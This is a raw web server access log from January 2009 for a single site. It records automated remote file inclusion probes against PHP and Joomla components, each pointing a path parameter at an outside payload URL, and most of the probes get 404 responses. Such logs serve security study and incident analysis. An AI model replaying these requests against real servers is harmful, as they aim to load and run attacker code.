213.226.166.122 - - [06/Jan/2009:04:03:04 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
161.58.71.77 - - [06/Jan/2009:04:07:36 -0800] "GET /logs/access_081005.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://dowgroup.com//phplive/web/groups/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:04:08:35 -0800] "GET /logs/access.log/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "thepointers.net"
85.214.53.78 - - [06/Jan/2009:04:08:36 -0800] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "thepointers.net"
85.214.53.78 - - [06/Jan/2009:04:08:36 -0800] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "thepointers.net"
86.109.170.176 - - [06/Jan/2009:04:09:48 -0800] "GET /logs/access_081208.log/index.php?sayfa=http://usuarios.lycos.es/kilitos2008/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
86.109.170.176 - - [06/Jan/2009:04:09:48 -0800] "GET /logs/index.php?sayfa=http://usuarios.lycos.es/kilitos2008/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
86.109.170.176 - - [06/Jan/2009:04:09:48 -0800] "GET /index.php?sayfa=http://usuarios.lycos.es/kilitos2008/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:10:54 -0800] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:10:54 -0800] "GET /logs/access.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:10:54 -0800] "GET /sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:11:00 -0800] "GET /logs/access.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:11:00 -0800] "GET /sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:11:00 -0800] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "thepointers.net"
203.231.233.54 - - [06/Jan/2009:04:12:42 -0800] "GET /logs/access.log%20//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
203.231.233.54 - - [06/Jan/2009:04:12:42 -0800] "GET /?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "thepointers.net"
203.231.233.54 - - [06/Jan/2009:04:12:44 -0800] "GET /logs//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 2373 "-" "libwww-perl/5.822" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:13:08 -0800] "GET /logs/access.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:13:08 -0800] "GET /sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:04:13:12 -0800] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "thepointers.net"
203.231.233.54 - - [06/Jan/2009:04:14:16 -0800] "GET /logs/access.log%20//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
203.231.233.54 - - [06/Jan/2009:04:14:16 -0800] "GET /?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.822" "thepointers.net"
203.231.233.54 - - [06/Jan/2009:04:14:16 -0800] "GET /logs//?path%5Bdocroot%5D=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 200 2373 "-" "libwww-perl/5.822" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:16:44 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:16:45 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:16:46 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
62.141.37.54 - - [06/Jan/2009:04:17:29 -0800] "GET /logs/access_081208.log//citywriter/head.php?path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
62.141.37.54 - - [06/Jan/2009:04:17:29 -0800] "GET /logs//citywriter/head.php?path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:18:16 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:18:16 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:18:17 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
62.141.37.54 - - [06/Jan/2009:04:20:20 -0800] "GET /logs/access_081206.log//citywriter/head.php?path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:22:53 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:22:54 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:22:55 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:04:23:57 -0800] "GET /logs/access_081010.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:04:23:57 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:04:23:58 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:04:23:59 -0800] "GET /logs/access_080930.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
205.231.144.152 - - [06/Jan/2009:04:24:10 -0800] "GET /logs/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.thepointers.net"
205.231.144.152 - - [06/Jan/2009:04:24:12 -0800] "GET /components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:26:14 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:48 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:49 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:49 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:26:50 -0800] "GET /logs/access_081205.log//inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:26:51 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:52 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:26:53 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:54 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:54 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:54 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:55 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:26:55 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:27:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:27:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:27:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:27:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:04:30:11 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:30:12 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:04:30:14 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:04:30:14 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
222.239.227.49 - - [06/Jan/2009:04:30:49 -0800] "GET /logs/access_081006.log/errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
222.239.227.49 - - [06/Jan/2009:04:30:49 -0800] "GET /errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
222.239.227.49 - - [06/Jan/2009:04:30:50 -0800] "GET /logs/errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
222.239.227.49 - - [06/Jan/2009:04:30:57 -0800] "GET /logs/access_081006.log/errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
222.239.227.49 - - [06/Jan/2009:04:30:58 -0800] "GET /errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
222.239.227.49 - - [06/Jan/2009:04:30:58 -0800] "GET /logs/errors.php?error=http://www.artofwise.gr/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
218.234.23.56 - - [06/Jan/2009:04:35:49 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
218.234.23.56 - - [06/Jan/2009:04:35:49 -0800] "GET /logs/access_081208.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
218.234.23.56 - - [06/Jan/2009:04:35:49 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:04:36:52 -0800] "GET /logs/access_081206.log/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:04:36:52 -0800] "GET /logs/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:04:40:47 -0800] "GET /!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:37:12 -0800] "GET /logs/access_081208.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:37:13 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:37:14 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:37:17 -0800] "GET /logs/access_081208.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:37:17 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:37:19 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:40:21 -0800] "GET /logs/access_081208.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:40:22 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:40:23 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:41:11 -0800] "GET /logs/access_081208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:41:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:41:11 -0800] "GET /logs/access_081208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:41:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:41:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:41:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:43:05 -0800] "GET /logs/access_081205.log//citywriter/head.php?path=http://www.mymudpie.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:43:05 -0800] "GET /citywriter/head.php?path=http://www.mymudpie.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:43:05 -0800] "GET /logs//citywriter/head.php?path=http://www.mymudpie.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:43:16 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:43:16 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:43:17 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:43:17 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:43:17 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
194.135.103.242 - - [06/Jan/2009:04:43:18 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:43:52 -0800] "GET /logs/access_081206.log//citywriter/head.php?path=http://www.mymudpie.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:44:39 -0800] "GET /citywriter/head.php?path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:44:39 -0800] "GET /logs/access_081205.log//citywriter/head.php?path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:44:39 -0800] "GET /logs//citywriter/head.php?path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.thepointers.net"
94.136.35.207 - - [06/Jan/2009:04:45:09 -0800] "GET /logs/access_081206.log//citywriter/head.php?path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.thepointers.net"
207.182.137.218 - - [06/Jan/2009:04:46:38 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
207.182.137.218 - - [06/Jan/2009:04:46:38 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
207.182.137.218 - - [06/Jan/2009:04:46:38 -0800] "GET /logs/access_081205.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
207.182.137.218 - - [06/Jan/2009:04:46:39 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.thepointers.net"
207.182.137.218 - - [06/Jan/2009:04:46:39 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.thepointers.net"
